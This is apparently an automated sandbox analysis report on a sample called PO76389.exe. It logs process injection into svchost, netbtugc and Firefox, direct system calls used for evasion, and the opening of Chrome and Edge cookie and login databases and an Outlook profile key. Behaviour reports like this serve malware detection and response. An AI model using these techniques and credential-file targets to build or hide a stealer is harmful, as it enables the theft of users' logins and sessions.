            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203749 mov eax, dword ptr fs:[00000030h]2_2_03203749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B765 mov eax, dword ptr fs:[00000030h]2_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B765 mov eax, dword ptr fs:[00000030h]2_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B765 mov eax, dword ptr fs:[00000030h]2_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B765 mov eax, dword ptr fs:[00000030h]2_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF78A mov eax, dword ptr fs:[00000030h]2_2_031EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032037B6 mov eax, dword ptr fs:[00000030h]2_2_032037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315D7B0 mov eax, dword ptr fs:[00000030h]2_2_0315D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F7BA mov eax, dword ptr fs:[00000030h]2_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B97A9 mov eax, dword ptr fs:[00000030h]2_2_031B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]2_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]2_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]2_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]2_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BF7AF mov eax, dword ptr fs:[00000030h]2_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031307AF mov eax, dword ptr fs:[00000030h]2_2_031307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313C7C0 mov eax, dword ptr fs:[00000030h]2_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031357C0 mov eax, dword ptr fs:[00000030h]2_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031357C0 mov eax, dword ptr fs:[00000030h]2_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031357C0 mov eax, dword ptr fs:[00000030h]2_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B07C3 mov eax, dword ptr fs:[00000030h]2_2_031B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]2_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]2_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313D7E0 mov ecx, dword ptr fs:[00000030h]2_2_0313D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE7E1 mov eax, dword ptr fs:[00000030h]2_2_031BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03133616 mov eax, dword ptr fs:[00000030h]2_2_03133616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03133616 mov eax, dword ptr fs:[00000030h]2_2_03133616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172619 mov eax, dword ptr fs:[00000030h]2_2_03172619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03161607 mov eax, dword ptr fs:[00000030h]2_2_03161607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE609 mov eax, dword ptr fs:[00000030h]2_2_031AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316F603 mov eax, dword ptr fs:[00000030h]2_2_0316F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205636 mov eax, dword ptr fs:[00000030h]2_2_03205636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E627 mov eax, dword ptr fs:[00000030h]2_2_0314E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F626 mov eax, dword ptr fs:[00000030h]2_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03166620 mov eax, dword ptr fs:[00000030h]2_2_03166620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168620 mov eax, dword ptr fs:[00000030h]2_2_03168620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313262C mov eax, dword ptr fs:[00000030h]2_2_0313262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314C640 mov eax, dword ptr fs:[00000030h]2_2_0314C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03162674 mov eax, dword ptr fs:[00000030h]2_2_03162674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]2_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]2_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]2_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]2_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03169660 mov eax, dword ptr fs:[00000030h]2_2_03169660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03169660 mov eax, dword ptr fs:[00000030h]2_2_03169660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]2_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]2_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B368C mov eax, dword ptr fs:[00000030h]2_2_031B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B368C mov eax, dword ptr fs:[00000030h]2_2_031B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B368C mov eax, dword ptr fs:[00000030h]2_2_031B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B368C mov eax, dword ptr fs:[00000030h]2_2_031B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031276B2 mov eax, dword ptr fs:[00000030h]2_2_031276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031276B2 mov eax, dword ptr fs:[00000030h]2_2_031276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031276B2 mov eax, dword ptr fs:[00000030h]2_2_031276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031666B0 mov eax, dword ptr fs:[00000030h]2_2_031666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C6A6 mov eax, dword ptr fs:[00000030h]2_2_0316C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D6AA mov eax, dword ptr fs:[00000030h]2_2_0312D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D6AA mov eax, dword ptr fs:[00000030h]2_2_0312D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0316A6C7
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004DA937 GetProcessHeap,0_2_004DA937
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D8E19 SetUnhandledExceptionFilter,0_2_004D8E19
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004D8E3C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 6404Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 27C0008Jump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004EBE95 LogonUserW,0_2_004EBE95
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_004B374E
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F4B52 SendInput,keybd_event,0_2_004F4B52
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F7DD5 mouse_event,0_2_004F7DD5
            Source: C:\Users\user\Desktop\PO76389.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO76389.exe"Jump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004EB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_004EB398
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004EBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004EBE31
            Source: TrBUxuahdhJ.exe, 00000004.00000000.2453637950.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000002.4568940643.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569241870.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: PO76389.exe, TrBUxuahdhJ.exe, 00000004.00000000.2453637950.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000002.4568940643.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569241870.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: TrBUxuahdhJ.exe, 00000004.00000000.2453637950.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000002.4568940643.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569241870.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: PO76389.exe, 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: TrBUxuahdhJ.exe, 00000004.00000000.2453637950.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000002.4568940643.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569241870.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D7254 cpuid 0_2_004D7254
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D40DA GetSystemTimeAsFileTime,__aulldiv,0_2_004D40DA
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0052C146 GetUserNameW,0_2_0052C146
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004E2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_004E2C3C
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004CE47B

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PO76389.exe, 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: PO76389.exeBinary or memory string: WIN_81
            Source: PO76389.exeBinary or memory string: WIN_XP
            Source: PO76389.exeBinary or memory string: WIN_XPe
            Source: PO76389.exeBinary or memory string: WIN_VISTA
            Source: PO76389.exeBinary or memory string: WIN_7
            Source: PO76389.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
